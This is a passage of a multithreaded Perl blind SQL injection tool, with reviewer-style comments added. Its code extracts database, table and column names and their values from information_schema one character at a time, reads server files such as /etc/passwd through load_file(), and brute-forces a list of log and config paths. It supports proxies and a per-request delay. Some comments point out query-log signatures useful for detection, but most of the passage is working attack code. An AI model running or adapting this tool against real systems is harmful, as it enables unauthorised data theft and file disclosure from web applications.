  2408.                     if ($bl_mode==0) {
  2409.                          $data1 .= chr(get_res_normal());
  2410.                     } else {
  2411.                          $data1 .= chr(get_res_normal1());
  2412.                     }
  2413.                       print $data1 . "\r";
  2414.                    }
  2415.                  }
  2416.                  print "\n-----------------------------------\n";
  2417.                  print " Answer limit $sss,1 --->  " . $data1 . "\n";
  2418.                  print "-----------------------------------\n";
  2419.                  print FILE1 " Answer limit $sss,1 ---> " . $data1 . "\n";
                        # NOTE(review): resets $data rather than the $data1 buffer; no
                        # visible effect.
  2420.                  $data = "";
  2421.             }
  2422.             sleep $pause;
  2423.         }
  2424.     }
  2425.     print "----------\n";
  2426.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2427.     close(FILE1);
  2428.     goto START10;
  2429. } # end some query
  2430. #########################################################################################################################################################
  2431. # Blind columns from tables from DB names
  2432. if ($choice==5) {
  2433.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2434.      $bl_table_number_NIS = "";
  2435.      print "-----------------------------------------\n";
  2436.      print "Enter the DB-name: ";
  2437.      $choice = <STDIN>;
  2438.      chomp $choice;
  2439.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2440.      print "DB-name: $choice\n";
  2441.      print "----------\n";
  2442.      $choice1 = ascii_to_hex $choice;
  2443.      print "-----------------------------------------\n";
  2444.      print "Enter the TABLE-name: ";
  2445.      $choice2 = <STDIN>;
  2446.      chomp $choice2;
  2447.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  2448.      print "TABLE-name: $choice2\n";
  2449.      print "----------\n";
  2450.      $choice3 = ascii_to_hex $choice2;
  2451.      ## ???????? ##
  2452.      $bl_lenght = "";
  2453.      $ii = 0;
  2454.      $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
  2455.             if ($bl_mode==0) {
  2456.                    $bl_lenght = len_check();
  2457.             } else {
  2458.                    $bl_lenght = len_check1();
  2459.             }
  2460.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2461.           print "Columns in [$choice.$choice2] [length]:" .  $bl_lenght . "\n";
  2462.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2463.                if ($bl_mode==0) {
  2464.                    $bl_table_number_NIS .= get_res_count();
  2465.                } else {
  2466.                    $bl_table_number_NIS .= get_res_count1();
  2467.                }
  2468.                 print $bl_table_number_NIS . "\r";
  2469.                 sleep $pause;
  2470.           }
  2471.           print "\n------------------------------------------------------\n";
  2472.           print "Columns in [$choice.$choice2] [value]:" . $bl_table_number_NIS . "\n";
  2473.           print "--------------------------------------------------------\n";
  2474.      } else {
  2475.           print "\n------------------------------------------------------\n";
  2476.           print "Cant't get data...\n";
  2477.           print "------------------------------------------------------\n";
  2478.      }
  2479.      $time = localtime;
  2480.      print $time . "\n";
  2481.      print "-----------------------------------\n";
  2482.      ## start from2 ##
  2483.      print FILE1  "-----------------------------------------\n";
  2484.      print FILE1  "Columns in [$choice.$choice2]: - $bl_table_number_NIS\n";
  2485.      print FILE1  "-----------------------------------------\n";
  2486.      print "Normal MODE - records > 10\n";
  2487.      print "Fast MODE - records <= 10\n";
  2488.      print "-----------------------------------------\n";
  2489.      $thr = $kol_threads; # ???-?? ???????
  2490.      $num = -1; # ?? ????????
  2491.      ## end from2
  2492.      print "Request method - $method\n";
  2493.      print "Threads - $kol_threads\n";
  2494.      print "Proxy - $proxy_message\n";
  2495.      print "----------------------\n";
  2496.      TABLES:
  2497.      $time = localtime;
  2498.      print $time . "\n";
  2499.      print "-----------------------------------\n";
  2500.      # ?????? DB #
  2501.      $bl_lenght = "";
  2502.      $ii = 0;
  2503.      $s = 0;
  2504.      $mflag = 0;
  2505.      print "-----------------------------------\n";
  2506.      for(0..$thr) {
  2507.          $trl[$_] = threads->create(\&gets102333);
  2508.      }
  2509.      for(0..$thr) {
  2510.          $trl[$_]->join;
  2511.      }
     # Worker body for the "columns from a table in a named DB" branch (the
     # branch itself starts above this view).  Each thread takes the next
     # index from the shared counter $num and extracts one column_name for
     # table $choice3 in schema $choice1 (both hex literals built by the
     # caller) until $num reaches $bl_table_number_NIS, the column count the
     # caller already extracted.  Apart from $num, every global touched here
     # is a per-thread copy under ithreads, so threads do not clobber each
     # other's $bl_current/$bl_lenght/$data1.
     sub gets102333 {
        $| = 1;   # unbuffered STDOUT so the "\r" progress output is visible
        while ($num < $bl_table_number_NIS) {
            # Only the increment is under the lock; the comparison above is
            # not, so two threads can pass the check together and $num can
            # overshoot the count.  The loop also runs once for index
            # $bl_table_number_NIS itself; the length check below drops the
            # empty result such an index produces.
            { lock($num);
            $num++; }
            $sss = $num;   # this thread's index, kept for the messages below
            # Subselect for the $num-th column name.  $bl_plus / $plus stand
            # in for whitespace (set outside this view).  Server-side this
            # shows up as a run of sequential "limit <n>,1" subselects
            # against information_schema.columns - a strong query-log signal.
            $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $choice3 . $bl_plus . "and" . $bl_plus . "table_schema=" . $plus . $choice1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
            # len_check()/len_check1() take no arguments; presumably they
            # read $bl_current and return the length of its value - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
            # Anything outside 1..999 is treated as "nothing there".
            if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                 print "\nColumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
                 # Fast path: $mflag is set to 0 by the caller right before
                 # the threads start and is not set to 1 anywhere in this
                 # branch, so gets1000() is only reached if $mflag is changed
                 # elsewhere.
                 if ($mflag == 1) {
                     ############################################################
                     %aa = ();   # clears the hash %aa; unrelated to the scalar $aa below
                     $aa = gets1000();
                     $data1 = "";
                     # Reassemble the returned position => char map in key
                     # order ("for" is a statement modifier; the trailing
                     # comma is legal but unusual).
                     $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
                     #############################################################
                 } else {
                   # Normal path: one character per position, $ii counting 1..length.
                   $data1 = "";
                   for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                    # get_res_normal()/get_res_normal1() take no arguments;
                    # presumably they read $bl_current and $ii and return a
                    # character code - verify.
                    if ($bl_mode==0) {
                         $data1 .= chr(get_res_normal());
                    } else {
                         $data1 .= chr(get_res_normal1());
                    }
                      print $data1 . "\r";
                   }
                 }
                 print "\n-----------------------------------\n";
                 print "  ---> Column limit $sss,1: " . $data1 . "\n";
                 print "-----------------------------------\n";
                 # FILE1 is the results file opened by the caller; each
                 # thread presumably holds its own copy of the handle, so
                 # lines from different threads can interleave.
                 print FILE1 "  ---> Column limit $sss,1: " . $data1 . "\n";
                 $data = "";   # resets $data, not $data1 - apparently a leftover
            }
            sleep $pause;   # per-request delay, configured outside this view
        }
    }
  2553.     print "----------\n";
  2554.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2555.     close(FILE1);
  2556.     goto START10;
  2557. } # end columns from tables from DB names
  2558. # blind LOAD_FILE log/conf BRUTE
if ($choice==7) {
       # Mode 7: probe a wordlist of file paths with length(load_file(...))
       # and record the ones the DB server can read.  Whether load_file()
       # returns anything at all is governed server-side by the FILE
       # privilege and secure_file_priv; the probe pattern (one hex-literal
       # path per request, $thr+1 parallel threads) is easy to spot in
       # query logs.
       open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file z_<host>.txt, append mode; 2-arg open, bareword handle, return unchecked (original comment unreadable in the paste)
       $bl_lenght=0;
       print "   Brute log/conf files\n";
       print "   -------------\n";
       print FILE1 "   Brute log/conf files\n";
       print FILE1 "   -------------\n";
       # Read the path list ($lrl_list, a file name set outside this view)
       # into the array @lrl_list - same name, different sigil.  The open
       # is unchecked: an unreadable list silently yields zero paths.
       open(FILE, "<", $lrl_list);
       while(<FILE>) {
         chomp;
         push(@lrl_list, $_);
       }
       close(FILE);
       $size = 0;
       $size = @lrl_list;   # array in scalar context: number of paths
       print "File: $lrl_list\n";
       print "Paths: $size\n";
       print "-------------\n";
       print "Request method - $method\n";
       print "Threads - $kol_threads\n";
       print "Proxy - $proxy_message\n";
       print "----------------------\n";
       $thr = $kol_threads; # thread count from the global config; 0..$thr below starts $thr+1 workers
       $num = -1; # shared counter; the first worker increments it to 0
       for(0..$thr) {
            $trl[$_] = threads->create(\&gets996655);
       }
       for(0..$thr) {
            $trl[$_]->join;
       }
       # Worker: take the next index from $num, build "/<path>" as a hex
       # literal, probe its length and log the path when the length is >= 2.
       # Only $num is shared; the other globals are per-thread copies.
       sub gets996655 {
            $| = 1;   # unbuffered STDOUT for the "\r" progress counter
            while ($num<$size) {
               # The body still runs once after $num reaches $size-1 (and
               # check/increment are not atomic, so it can overshoot
               # further); $lrl_list[$num] is then undef and the probed
               # path degenerates to "/".
               { lock($num);
               $num++; }
               $choice1111  = '/'.$lrl_list[$num];
               $choice2222 = ascii_to_hex $choice1111;   # "0x..." literal, needs no quotes in the query
               print $choice1111 . "\n";
               $bl_lenght = "";
               $bl_current = "length(load_file(" . $choice2222 .  "))";
               # len_check()/len_check1() take no arguments; presumably they
               # evaluate $bl_current through the injection point - verify.
               if ($bl_mode==0) {
                   $bl_lenght = len_check();
               } else {
                   $bl_lenght = len_check1();
               }
               # A length of at least 2 is taken as "file exists and is readable".
               if  (($bl_lenght >= 2)) {
                    print "   ---> " . $choice1111 . "\n";
                    print FILE1 "  "  . $choice1111 . "\n";
               }
               $bl_lenght=0;
               print $num . "\r";
               sleep $pause;   # per-request delay, configured outside this view

            }
       }
    print "----------\n";
    print "Saved in " . "z_" . $host3 . ".txt\n";
    close(FILE1);
    goto START10;   # back to the main menu label (outside this view)
} # end blind LOAd_FILE BRUTE
  2619. # blind LOAd_FILE
if ($choice==6) {
     # Mode 6: read one file through load_file().  The file length is
     # extracted first, digit by digit, then load_file() (the sub below)
     # pulls the content one byte per blind probe across $thr+1 threads.
     # Server-side this depends on the FILE privilege / secure_file_priv and
     # shows up as a long run of load_file(0x...) subselects with
     # increasing positions.
     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file z_<host>.txt, append mode; 2-arg open, bareword handle, return unchecked (original comment unreadable in the paste)
     $bl_table_number_NIS = "";   # will hold the file length as a digit string
     print "-----------------------------------------\n";
     print "Enter file name (example: /etc/passwd): ";
     $choice = <STDIN>;
     chomp $choice;
     print "File name for read: $choice\n";
     $choice1 = ascii_to_hex $choice;   # "0x..." literal of the path
     ## length of the value (original heading unreadable in the paste) ##
     $bl_lenght = "";
     $ii = 0;
     $bl_current = "length(load_file(" . $choice1 .  "))";
            # len_check()/len_check1() take no arguments; presumably they
            # evaluate $bl_current and return the length of its result - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
     # $bl_lenght is the number of digits in the file size; fewer than 2
     # is treated as "not readable".
     if  (($bl_lenght >= 2)) {
          print "File [$choice] size [length]:" .  $bl_lenght . "\n";
          # get_res_count()/get_res_count1() take no arguments; presumably
          # they return the $ii-th digit of the current value - verify.
          for ($ii = 1; $ii <= $bl_lenght; $ii++) {
               if ($bl_mode==0) {
                   $bl_table_number_NIS .= get_res_count();
               } else {
                   $bl_table_number_NIS .= get_res_count1();
               }
                print $bl_table_number_NIS . "\r";
                sleep $pause;
          }
          print "\n------------------------------------------------------\n";
          print "File [$choice] size: - $bl_table_number_NIS bytes\n";
          print "--------------------------------------------------------\n";
     } else {
          print "\n------------------------------------------------------\n";
          print "Cant't get data...\n";
          print "------------------------------------------------------\n";
          close(FILE1);   # this branch closes the handle itself before leaving
          goto START10;
     }
     $time = localtime;   # scalar context: human-readable timestamp
     print $time . "\n";
     ## start from2 ##
     print FILE1  "-----------------------------------------\n";
     print FILE1  "File [$choice] size: - $bl_table_number_NIS bytes\n";
     print FILE1  "-----------------------------------------\n";
     # (original comment unreadable in the paste)
     $thr = $kol_threads; # thread count from the global config
     $num = -1; # shared counter; load_file() re-sets it below
     ## end from2
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     TABLES:   # not jumped to within this branch (the same label is declared in other branches)
     $time = localtime;
     print $time . "\n";
     print "-----------------------------------\n";
     # (original comment unreadable in the paste)
     $bl_lenght = "";
     $ii = 0;
     $s = 0;       # not read anywhere in this branch
     $mflag = 0;   # not read in this branch either; gets102444 has no fast path
     print "-----------------------------------\n";
     $bl_current = "(load_file(" . $choice1 .  "))";   # expression the workers extract from
     %aa = ();    # clears the hash %aa; unrelated to the scalar $aa below
     $aa = load_file();   # position => byte map merged from all threads
     $data1000 = "";
     # Reassemble in position order ("for" as a statement modifier; the
     # trailing comma is legal but unusual).
     $data1000 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
     print FILE1 $data1000;   # raw bytes, no separator or trailing newline
     # Ask whether to dump the whole file or a byte range, then run $thr+1
     # worker threads and merge their position => byte hashes.  Named subs
     # are compiled regardless of the enclosing "if", so the call above the
     # definition works.
     sub load_file {
         $thr = $kol_threads; # thread count from the global config
         print "Get ALL file ($bl_table_number_NIS) or PART of file ? (1/0): ";
         $choice = <STDIN>;
         chomp $choice;
         if ($choice == 1) {
             $num = -1; # shared counter; the first worker increments it to 0
         } else {
             print "Enter START byte: ";
             # Reuses $choice1, which held the hex path; harmless here since
             # $bl_current was built before this sub was called.
             $choice1 = <STDIN>;
             chomp $choice1;
             $num = $choice1-2;   # first worker index is then $choice1-1
             print "Enter END byte: ";
             $choice2 = <STDIN>;
             chomp $choice2;
             $bl_table_number_NIS = $choice2;   # loop bound for the workers
             print "Dump bytes of file from [" . ($num+2) . "] to [" . ($bl_table_number_NIS) . "]\n";
         }
         print "-----------------------------------------\n";
         ## end from2
         %res1 = ();
         for(0..$thr) {
             $trl[$_] = threads->create(\&gets102444);
         }
         # Each join returns a hash ref; merge them into %res1.
         for(0..$thr) {
             %res1 = (%res1, %{$trl[$_]->join});
         }
         # Worker: take the next position from $num, fetch one byte and
         # store it under that position.  %hash1 is a plain global, so each
         # thread fills its own per-thread copy and returns a reference to
         # it; the joining thread presumably receives a copy of that data.
         sub gets102444 {
             $data2 = "";
             $| = 1;   # unbuffered STDOUT: bytes are echoed as they arrive
             while ($num < $bl_table_number_NIS) {
                   # Comparison and increment are not atomic, so $num can
                   # overshoot the end position.
                   { lock($num);
                   $num++; }
                   $ii = $num;   # position presumably read by get_res_normal()/get_res_normal1() - verify
                   if ($bl_mode==0){
                        $data2 = chr(get_res_normal());
                   } else {
                        $data2 = chr(get_res_normal1());
                   }
                   $hash1{$ii} = $data2;
                   print $data2;
             }
             return \%hash1
         }
         return \%res1;
    }
    print "----------\n";
    print "Saved in " . "z_" . $host3 . ".txt\n";
    close(FILE1);
    goto START10;   # back to the main menu label (outside this view)
} # end blind LOAd_FILE
if ($choice==8) {
     # Mode 8: list table names outside information_schema (the literal
     # 0x696e666f726d6174696f6e5f736368656d61 decodes to
     # "information_schema").  The count is extracted first, digit by
     # digit, then $thr+1 workers pull one name each per "limit <n>,1"
     # subselect - sequential offsets against information_schema.tables
     # are the query-log signature of this mode.
     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file z_<host>.txt, append mode; 2-arg open, bareword handle, return unchecked (original comment unreadable in the paste)
     print "-----------------------------------\n";
     ## length of the value (original heading unreadable in the paste) ##
     $bl_lenght = "";
     $ii = 0;
     $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61)";
            # len_check()/len_check1() take no arguments; presumably they
            # evaluate $bl_current and return the length of its result - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
     # $bl_lenght is the number of digits in the count; 1..999 accepted.
     if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
          print "Count tables NOT in information_schema [length]:" .  $bl_lenght . "\n";
          # Digits are appended to $bl_table_number_NIS, which this branch
          # does not clear first (compare the $choice==6 branch).
          # get_res_count()/get_res_count1() take no arguments; presumably
          # they return the $ii-th digit of the current value - verify.
          for ($ii = 1; $ii <= $bl_lenght; $ii++) {
               if ($bl_mode==0) {
                   $bl_table_number_NIS .= get_res_count();
               } else {
                   $bl_table_number_NIS .= get_res_count1();
               }
                print $bl_table_number_NIS . "\r";
                sleep $pause;
          }
          print "\n------------------------------------------------------\n";
          print "Count tables NOT in information_schema [value]:" . $bl_table_number_NIS . "\n";
          print "--------------------------------------------------------\n";
     } else {
          print "\n------------------------------------------------------\n";
          print "Cant't get data...\n";
          print "------------------------------------------------------\n";
     }
     $time = localtime;   # scalar context: human-readable timestamp
     print $time . "\n";
     print "-----------------------------------\n";
     ## start from2 ##
     print FILE1  "-----------------------------------------\n";
     print FILE1  "Tables - $bl_table_number_NIS\n";
     print FILE1  "-----------------------------------------\n";
     # Informational only: $mflag is set to 0 below, so gets102 never takes
     # its fast path from this branch.
     print "Normal MODE - records > 10\n";
     print "Fast MODE - records <= 10\n";
     print "-----------------------------------------\n";
     print "Get ALL tables ($bl_table_number_NIS) ? (1/0): ";
     $choice = <STDIN>;
     chomp $choice;
     $thr = $kol_threads; # thread count from the global config; 0..$thr below starts $thr+1 workers
     if ($choice == 1) {
          $num = -1; # shared counter; the first worker increments it to 0
     } else {
          # START/END are entered 1-based; the workers use 0-based LIMIT
          # offsets, hence the -2 / -1 adjustments (the message below
          # converts back).
          print "Enter START_position: ";
          $choice1 = <STDIN>;
          chomp $choice1;
          $num = $choice1-2;
          print "Enter END_position: ";
          $choice2 = <STDIN>;
          chomp $choice2;
          $bl_table_number_NIS = $choice2-1;
          print "Dump records from [" . ($num+2) . "] to [" . ($bl_table_number_NIS+1) . "]\n";
     }
     print "-----------------------------------------\n";
     ## end from2
     print "Request method - $method\n";
     print "Threads - $kol_threads\n";
     print "Proxy - $proxy_message\n";
     print "----------------------\n";
     TABLES:   # not jumped to within this branch (the same label is declared in other branches)
     $time = localtime;
     print $time . "\n";
     print "-----------------------------------\n";
     # (original comment unreadable in the paste)
     $bl_lenght = "";
     $ii = 0;
     $s = 0;       # not read anywhere in this branch
     $mflag = 0;   # per-thread copy read by gets102; 0 selects the per-character path
     print "-----------------------------------\n";
     for(0..$thr) {
         $trl[$_] = threads->create(\&gets102);
     }
     for(0..$thr) {
         $trl[$_]->join;
     }
     # Worker: take the next index from $num and extract the table name at
     # that LIMIT offset.  Only $num is shared; the other globals are
     # per-thread copies.
     sub gets102 {
        $| = 1;   # unbuffered STDOUT so the "\r" progress output is visible
        while ($num < $bl_table_number_NIS) {
            # Comparison and increment are not atomic, and the body also
            # runs once for index $bl_table_number_NIS itself; the length
            # check below filters the empty result of an out-of-range offset.
            { lock($num);
            $num++; }
            $sss = $num;   # this thread's index, kept for the messages below
            $bl_current = "(select" . $bl_plus .  "table_name" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema!=0x696e666f726d6174696f6e5f736368656d61" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
            # len_check()/len_check1() take no arguments; presumably they
            # read $bl_current and return the length of its value - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
            if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                 print "\ntable limit $sss,1 [length]:" .  $bl_lenght . "\n";
                 # Fast path is only reachable if $mflag is set to 1
                 # somewhere outside this branch.
                 if ($mflag == 1) {
                     ############################################################
                     %aa = ();   # clears the hash %aa; unrelated to the scalar $aa below
                     $aa = gets1000();
                     $data1 = "";
                     # Reassemble the position => char map in key order.
                     $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
                     #############################################################
                 } else {
                   # One character per position, $ii counting 1..length.
                   # get_res_normal()/get_res_normal1() take no arguments;
                   # presumably they read $bl_current and $ii - verify.
                   $data1 = "";
                   for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                    if ($bl_mode==0) {
                         $data1 .= chr(get_res_normal());
                    } else {
                         $data1 .= chr(get_res_normal1());
                    }
                      print $data1 . "\r";
                   }
                 }
                 print "\n-----------------------------------\n";
                 print "  ---> table limit $sss,1: " . $data1 . "\n";
                 print "-----------------------------------\n";
                 print FILE1 "  ---> table limit $sss,1: " . $data1 . "\n";   # output from several threads may interleave
                 $data = "";   # resets $data, not $data1 - apparently a leftover
            }
            sleep $pause;   # per-request delay, configured outside this view
        }
    }
    print "----------\n";
    print "Saved in " . "z_" . $host3 . ".txt\n";
    close(FILE1);
    goto START10;   # back to the main menu label (outside this view)
}
  2866. if ($choice==9) {
  2867.     sub ascii_to_hex ($) {
  2868.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  2869.                $str = "0x" . $str;
  2870.              return $str;
  2871.     }
    # Mode 9 body: count the columns of a user-named table (no schema
    # filter, so same-named tables in other databases are counted too),
    # then start $thr+1 gets103 workers that extract the names one by one.
    open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # results file z_<host>.txt, append mode; 2-arg open, bareword handle, return unchecked (original comment unreadable in the paste)
    print "-----------------------------------------\n";
    print "Enter the table_name: ";
    $choice = <STDIN>;
    chomp $choice;
    if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}   # names containing "-" are backtick-quoted before encoding
    print "Table: $choice\n";
    print "----------\n";
    print FILE1  "-----------------------------------------\n";
    print FILE1  "Table [ $choice ]\n";
    print FILE1  "-----------------------------------------\n";
    COLUMNS:   # not jumped to within this view
    $table_name = $choice;
    $table_name1 = ascii_to_hex $table_name;   # "0x..." literal used in the subselects
    # count the columns of the table (original comment unreadable in the paste)
    print "-----------------------------------\n";
    ## length of the value (original heading unreadable in the paste) ##
    $bl_lenght = "";
    $ii = 0;
    $bl_column_number = "";   # column count, built as a digit string
    $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
            # len_check()/len_check1() take no arguments; presumably they
            # evaluate $bl_current and return the length of its result - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
    # $bl_lenght is the number of digits in the count; 1..999 accepted.
    if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
        print "Count columns from $table_name [length]:" .  $bl_lenght . "\n";
        ############################################################
        # get_res_count()/get_res_count1() take no arguments; presumably
        # they return the $ii-th digit of the current value - verify.
        for ($ii = 1; $ii <= $bl_lenght; $ii++) {
               if ($bl_mode==0) {
                   $bl_column_number .= get_res_count();
               } else {
                   $bl_column_number .= get_res_count1();
               }
                print $bl_column_number . "\r";
                sleep $pause;
        }
        print "\n------------------------------------------------------\n";
        print "Count columns from $table_name [value]:" . $bl_column_number . "\n";
        print "--------------------------------------------------------\n";
        # Informational only: $mflag is forced to 0 below, so gets103 takes
        # the per-character path regardless of this message.
        if ($bl_column_number <=10 ) {
              print "Fast MODE - records <= 10\n";
        } else {
              print "Normal MODE - records > 10\n";
        }
        print "--------------------------------------------------------\n";
        print FILE1 "Count columns from $table_name:" . $bl_column_number . "\n";
     } else {
        # Falls through to the worker start even on failure; with
        # $bl_column_number still "" the while loop in gets103 runs once.
        print "\n------------------------------------------------------\n";
        print "Cant't get data...\n";
        print "------------------------------------------------------\n";
     }
     $mflag = 0;   # per-thread copy read by gets103; 0 selects the per-character path
     print "-----------------------------------\n";
     $time = localtime;   # scalar context: human-readable timestamp
     print $time . "\n";
     print "-----------------------------------\n";
    ## get the columns (original heading unreadable in the paste) ##
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    # (original comment unreadable in the paste)
    print "----------------------------------------------\n";
    $thr = $kol_threads; # thread count from the global config; 0..$thr below starts $thr+1 workers
    $num = -1; # shared counter; the first worker increments it to 0
    $bl_lenght = "";
    $ii = 0;
    $s = 0;   # not read anywhere in this branch
    print "Get columns from $table_name:\n";
    print "-------------------------------------------------------------\n";
    for(0..$thr) {
       $trl[$_] = threads->create(\&gets103);
    }
    for(0..$thr) {
       $trl[$_]->join;
    }
    $time = localtime;
    print $time . "\n";
    # Worker for mode 9: take the next index from the shared counter $num
    # and extract the column_name at that LIMIT offset for $table_name1
    # (hex literal built by the caller), until $num reaches
    # $bl_column_number.  Only $num is shared; the other globals are
    # per-thread copies.  Query logs see sequential "limit <n>,1"
    # subselects against information_schema.columns.
    sub gets103 {
        $| = 1;   # unbuffered STDOUT so the "\r" progress output is visible
        while ($num < $bl_column_number) {
            # Comparison and increment are not atomic, and the body also
            # runs once for index $bl_column_number itself; the length
            # check below filters the empty result of an out-of-range offset.
            { lock($num);
            $num++; }
            $sss = $num;   # this thread's index, kept for the messages below
            $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
            # len_check()/len_check1() take no arguments; presumably they
            # read $bl_current and return the length of its value - verify.
            if ($bl_mode==0) {
                   $bl_lenght = len_check();
            } else {
                   $bl_lenght = len_check1();
            }
            if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
                 print "\ncolumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
                 # Fast path: the caller sets $mflag to 0 before starting the
                 # threads, so gets1000() is reached only if $mflag is set
                 # to 1 elsewhere.
                 if ($mflag == 1) {
                     ############################################################
                     %aa = ();   # clears the hash %aa; unrelated to the scalar $aa below
                     $aa = gets1000();
                     $data1 = "";
                     # Reassemble the position => char map in key order.
                     $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
                     #############################################################
                 } else {
                   # One character per position, $ii counting 1..length.
                   # get_res_normal()/get_res_normal1() take no arguments;
                   # presumably they read $bl_current and $ii - verify.
                   $data1 = "";
                   for ($ii = 1; $ii <= $bl_lenght; $ii++) {
                    if ($bl_mode==0) {
                         $data1 .= chr(get_res_normal());
                    } else {
                         $data1 .= chr(get_res_normal1());
                    }
                      print $data1 . "\r";
                   }
                 }
                 print "\n-----------------------------------\n";
                 print "  ---> column limit $sss,1: " . $data1 . "\n";
                 print "-----------------------------------\n";
                 print FILE1 "  ---> column limit $sss,1: " . $data1 . "\n";   # output from several threads may interleave
                 $data = "";   # resets $data, not $data1 - apparently a leftover
            }
            sleep $pause;   # per-request delay, configured outside this view
        }
    }
    # Footer of mode 9: separator into the results file, tell the user
    # where the dump went, close the handle and return to the main menu
    # label (START10, defined outside this view).
    print FILE1 "----------\n";
    print "----------\n";
    print "Saved in " . "z_" . $host3 . ".txt\n";
    close(FILE1);
    goto START10;
  2998. }
  2999. if ($choice==10) {
  3000.     $schema_flag = 0;
  3001.     sub ascii_to_hex ($) {
  3002.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3003.                $str = "0x" . $str;
  3004.              return $str;
  3005.     }
  3006.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  3007.     print "-----------------------------------------\n";
  3008.     print "Enter the table_name: ";
  3009.     $choice = <STDIN>;
  3010.     chomp $choice;
  3011.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  3012.     $table_name = $choice;
  3013.     $table_name1 = ascii_to_hex $table_name;
  3014.     print "-----------------------------------------\n";
  3015.     print "MySQL>=5 or MySql<5? (1/0): ";
  3016.     $choice = <STDIN>;
  3017.     chomp $choice;
  3018.     if ($choice == 1) {
  3019.          BL_TABLE_SCHEMA:
  3020.          $schema_flag = 1;
  3021.          print "-----------------------------------------------------\n";
  3022.          print "Getting table_schema for $table_name, wait please... \n";
  3023.          print "-----------------------------------------------------\n";
  3024.          $bl_lenght = "";
  3025.          $bl_table_schema = "";
  3026.          $ii = 0;
  3027.          $bl_current = "(select" . $bl_plus .  "table_schema" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
  3028.             if ($bl_mode==0) {
  3029.                    $bl_lenght = len_check();
  3030.             } else {
  3031.                    $bl_lenght = len_check1();
  3032.             }
  3033.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3034.               print "Table_schema for table user [length]:" .  $bl_lenght . "\n";
  3035.               ############################################################
  3036.               %aa = ();
  3037.               $aa = gets1005();
  3038.               $data1 = "";
  3039.               $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3040.               #############################################################
  3041.               $bl_table_schema = $data1;
  3042.               if ($bl_table_schema =~ m/-/imgs) {$bl_table_schema = "`" . $choice . "`"}
  3043.               $schema_flag = 0;
  3044.               print "\n------------------------------------------------------\n";
  3045.               print "Table_schema for table user [value]:" . $bl_table_schema . "\n";
  3046.          } else {
  3047.               print "\n------------------------------------------------------\n";
  3048.               print "Cant't get data...\n";
  3049.               print "------------------------------------------------------\n";
  3050.          }
  3051.          $table_name = $bl_table_schema . "." . $table_name;
  3052.     }
  3053.     print "-----------------------------------------\n";
  3054.     print "Table: $table_name\n";
  3055.     print "-----------------------------------------\n";
  3056.     ##############################################################################################################
  3057.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  3058.     $choice = <STDIN>;
  3059.     chomp $choice;
  3060.     $column_name = $choice;
